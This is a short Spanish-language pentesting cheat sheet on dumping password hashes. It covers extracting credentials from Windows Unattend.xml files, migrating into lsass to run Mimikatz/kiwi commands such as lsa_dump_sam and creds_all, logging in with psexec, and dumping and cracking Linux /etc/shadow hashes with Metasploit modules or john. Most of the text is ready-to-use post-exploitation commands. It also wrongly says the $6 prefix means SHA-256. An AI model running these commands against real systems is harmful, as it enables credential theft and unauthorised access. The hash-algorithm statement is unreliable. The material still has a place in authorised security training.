Dumpear Hashes
Dumpear hashes se refiere al proceso de extraer o volcar los valores hash de contraseñas almacenadas en un sistema. Estos hashes son representaciones cifradas de contraseñas que los sistemas utilizan para autenticar usuarios sin almacenar las contraseñas en texto plano
Windows
Por defecto los hashes se encuentran en el SAM (Security Accounts Manager)
Rutas típicas
C:\\Windows\Panther\Unattend.xml (Suele estar codificada en base64)
C:\\Windows\Panther\Autounattend.xml
Búsqueda de Archivos
Usando metasploit una vez hayamos establecido la sesión meterpreter introducimos los siguientes comandos
meterpreter > search -f Unattend.xml
download unattend.xml
Al final de este archivo pondra la contraseña y usuario, y nos conectaremos usando psexec con estas credenciales
psexec.py <user>@ip
Mimikatz
Una vez tengamos la sesión meterpreter
Migraremos al proceso lsass para disponer de máximos privilegios
pgrep lsass
migrate <PID>
Cargamos la extensión kiwi en meterpreter
load kiwi
Para ver todos los comandos
?
Dumpeamos hashes de la SAM y tambien obtenemos la SysKey
lsa_dump_sam
Listamos algunas posibles credenciales
creds_all
Linux
Partimos de una consola meterpreter o bash y visualizamos el archivo /etc/shadow (solo si somos root)
El hash nos indica $6, esto quiere decir que está encriptado en el algoritmo SHA-256
Teniendo una sesión de meterpreter abierta podemos usar el módulo de hashdump
use post/linux/gather/hashdump
Indicamos la session donde lo vamos a importar
set SESSIONS <sesión>
run
Crackeamos usando Metasploit o podemos usar john
Módulo: use auxiliary/analyze/crack_linux
set SHA512 true (<codigo> por SHA512)
run
Última actualización